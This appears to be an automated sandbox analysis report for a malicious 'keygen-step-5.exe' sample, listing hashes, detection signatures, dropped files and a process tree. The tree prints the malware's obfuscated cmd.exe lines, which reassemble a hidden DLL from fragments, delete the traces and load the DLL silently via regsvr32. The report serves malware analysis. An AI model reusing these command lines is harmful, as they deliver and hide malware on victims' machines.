Overview
Static analysis score: 10
Tasks (score, sample, platform):
- 10  keygen-pr.exe  windows7_x64
- 1  keygen-pr.exe  windows10_x64
- 1  keygen-step-1.exe  windows7_x64
- 10  keygen-step-1.exe  windows10_x64
- 10  keygen-step-3.exe  windows7_x64
- 7  keygen-step-3.exe  windows10_x64
- 1  keygen-step-4.exe  windows7_x64
- 10  keygen-step-4.exe  windows10_x64
- (no score shown)  keygen-step-5.exe  windows7_x64  (the task this report covers)
- 8  keygen-step-5.exe  windows10_x64
- 8  keygen-step-6.exe  windows7_x64
- 7  keygen-step-6.exe  windows10_x64
- 6  keygen.bat  windows7_x64
- 10  keygen.bat  windows10_x64
Analysis
- max time kernel: 631s
- max time network: 678s
- platform: windows7_x64
- resource: win7v20210410
- submitted: 11-07-2021 14:10
Tasks (task id: sample, resource):
- static1: Static task
- behavioral1: keygen-pr.exe, win7v20210408
- behavioral2: keygen-pr.exe, win10v20210410
- behavioral3: keygen-step-1.exe, win7v20210408
- behavioral4: keygen-step-1.exe, win10v20210410
- behavioral5: keygen-step-3.exe, win7v20210410
- behavioral6: keygen-step-3.exe, win10v20210408
- behavioral7: keygen-step-4.exe, win7v20210410
- behavioral8: keygen-step-4.exe, win10v20210408
- behavioral9: keygen-step-5.exe, win7v20210410
- behavioral10: keygen-step-5.exe, win10v20210408
- behavioral11: keygen-step-6.exe, win7v20210410
- behavioral12: keygen-step-6.exe, win10v20210410
- behavioral13: keygen.bat, win7v20210408
General
- Target: keygen-step-5.exe
- Size: 1.1MB
- MD5: 747f74fabfd75d98062a485981249675
- SHA1: ae0f1726911463f6711f0f4077aaf0675e0f732a
- SHA256: 21517fbbdbdf6d0b77e35c00736adbeb025cb7050792ada79fb534c5733298c0
- SHA512: 7b790e759ea136534624366b693bf9f27919f58d987490500db0bd2ffba1406196fb0ec7c8e5121f8347f9aab49ef9f0c813025a19183d772e68f5350dccac4e
Malware Config
Signatures
- Executes dropped EXE (1 IoC)
  Process: Ee_SxWP.ExE (PID 1932)
- Loads dropped DLL (2 IoCs)
  Processes: cmd.exe (PID 1956), regsvr32.exe (PID 1464)
- Suspicious use of NtCreateThreadExHideFromDebugger (1 IoC)
  Process: regsvr32.exe (PID 1464)
- Enumerates physical storage devices (1 TTP)
  Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
- Kills process with taskkill (1 IoC)
  Process: taskkill.exe (PID 1060)
- Suspicious use of AdjustPrivilegeToken (1 IoC)
  Process: taskkill.exe (PID 1060), Token: SeDebugPrivilege
- Suspicious use of WriteProcessMemory (35 IoCs)
  Source PID/process -> target PID/process (identical repeated events collapsed; event count in parentheses):
  1728 keygen-step-5.exe -> 1956 cmd.exe (4)
  1956 cmd.exe -> 1932 Ee_SxWP.ExE (4)
  1956 cmd.exe -> 1060 taskkill.exe (4)
  1932 Ee_SxWP.ExE -> 1744 cmd.exe (4)
  1932 Ee_SxWP.ExE -> 1100 cmd.exe (4)
  1100 cmd.exe -> 1640 cmd.exe (4)
  1100 cmd.exe -> 652 cmd.exe (4)
  1100 cmd.exe -> 1464 regsvr32.exe (7)
Processes (tree depth in brackets; command lines as captured by the sandbox)
- [1] C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe (PID 1728)
  Command line: "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe"
  Signatures: Suspicious use of WriteProcessMemory
  - [2] C:\Windows\SysWOW64\cmd.exe (PID 1956)
    Command line: "C:\Windows\System32\cmd.exe" /Q /C CopY /y"C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ..\Ee_SxWP.ExE> nUl &&START ..\EE_sxWP.ExE /pyJcP63I6SaeVP58 &iF"" == "" for %zin ( "C:\Users\Admin\AppData\Local\Temp\keygen-step-5.exe" ) do taskkill /F -im "%~nXz" > nUl
    Signatures: Loads dropped DLL; Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE (PID 1932)
      Command line: ..\EE_sxWP.ExE /pyJcP63I6SaeVP58
      Signatures: Executes dropped EXE; Suspicious use of WriteProcessMemory
      - [4] C:\Windows\SysWOW64\cmd.exe (PID 1744)
        Command line: "C:\Windows\System32\cmd.exe" /Q /C CopY /y"C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE" ..\Ee_SxWP.ExE> nUl &&START ..\EE_sxWP.ExE /pyJcP63I6SaeVP58 &iF"/pyJcP63I6SaeVP58 " == "" for %zin ( "C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE" ) do taskkill /F -im "%~nXz" > nUl
      - [4] C:\Windows\SysWOW64\cmd.exe (PID 1100)
        Command line: "C:\Windows\System32\cmd.exe" /Q /c eChO Sl%RAnDom%b~C:\Users\Admin\AppData\Local\TempQ7C:\Users\Admin\AppData\Local\Tempn91> D7eYTR7e.XlX & eCho | sET /p = "MZ" > 85eRUS.S& Copy/Y /B 85erUs.S + K3w0pUAv.Bm + 7KOV.ZNS + EXQJRWMh.T + 1GLEMCQ.a + B~FB768.3_H + FKIlLQgE._ + YFp7m._OF + UzRt7.T1 +FNh1Wg6.Px8+ FKQURPz.6X8 +kWjJB5.HP + rX8pQRM.lR+ D7eYTR7E.XLX ..\oZIe4.4p>nuL & dEL /Q * > nUL&stArt regsvr32 ..\oZIE4.4P /s
        Signatures: Suspicious use of WriteProcessMemory
        - [5] C:\Windows\SysWOW64\cmd.exe (PID 1640)
          Command line: C:\Windows\system32\cmd.exe /S /D /c" eCho "
        - [5] C:\Windows\SysWOW64\cmd.exe (PID 652)
          Command line: C:\Windows\system32\cmd.exe /S /D /c" sET /p = "MZ" 1>85eRUS.S"
        - [5] C:\Windows\SysWOW64\regsvr32.exe (PID 1464)
          Command line: regsvr32 ..\oZIE4.4P /s
          Signatures: Loads dropped DLL; Suspicious use of NtCreateThreadExHideFromDebugger
    - [3] C:\Windows\SysWOW64\taskkill.exe (PID 1060)
      Command line: taskkill /F -im "keygen-step-5.exe"
      Signatures: Kills process with taskkill; Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Enterprise v6
Downloads (dropped files, unique paths; the per-file MD5/SHA1/SHA256/SHA512 values listed in the report are omitted here)
- C:\Users\Admin\AppData\Local\Temp\Ee_SxWP.ExE (listed three times; its MD5 747f74fabfd75d98062a485981249675 matches the submitted target, i.e. it is a renamed copy of keygen-step-5.exe)
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\1GLeMCq.a
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\7koV.zNs
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\85eRUS.S
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\EXqJRWMh.T
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\FKilLQge._
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\FNh1Wg6.Px8
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\b~FB768.3_h
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\fKqURPz.6x8
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\k3w0puAv.bm
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\kwjJB5.Hp
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\rX8pqRM.lR
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\uzRt7.t1
- C:\Users\Admin\AppData\Local\Temp\RarSFX1\yFp7m._oF
- C:\Users\Admin\AppData\Local\Temp\oZIE4.4P (also listed as \Users\Admin\AppData\Local\Temp\oZIe4.4p with identical hashes; the file assembled from the RarSFX1 fragments and passed to regsvr32 in the process tree above)
Memory dumps
- memory/652-70-0x0000000000000000-mapping.dmp
- memory/1060-64-0x0000000000000000-mapping.dmp
- memory/1100-68-0x0000000000000000-mapping.dmp
- memory/1464-84-0x0000000000000000-mapping.dmp
- memory/1464-88-0x0000000001FB0000-0x0000000002109000-memory.dmp (1.3MB)
- memory/1464-89-0x0000000000130000-0x0000000000131000-memory.dmp (4KB)
- memory/1464-90-0x0000000002FB0000-0x000000000309E000-memory.dmp (952KB)
- memory/1464-91-0x00000000030A0000-0x0000000003154000-memory.dmp (720KB)
- memory/1464-92-0x0000000003160000-0x000000000320C000-memory.dmp (688KB)
- memory/1464-93-0x0000000003210000-0x00000000032A9000-memory.dmp (612KB)
- memory/1464-94-0x0000000003210000-0x00000000032A9000-memory.dmp (612KB)
- memory/1640-69-0x0000000000000000-mapping.dmp
- memory/1728-59-0x00000000753E1000-0x00000000753E3000-memory.dmp (8KB)
- memory/1744-67-0x0000000000000000-mapping.dmp
- memory/1932-62-0x0000000000000000-mapping.dmp
- memory/1956-60-0x0000000000000000-mapping.dmp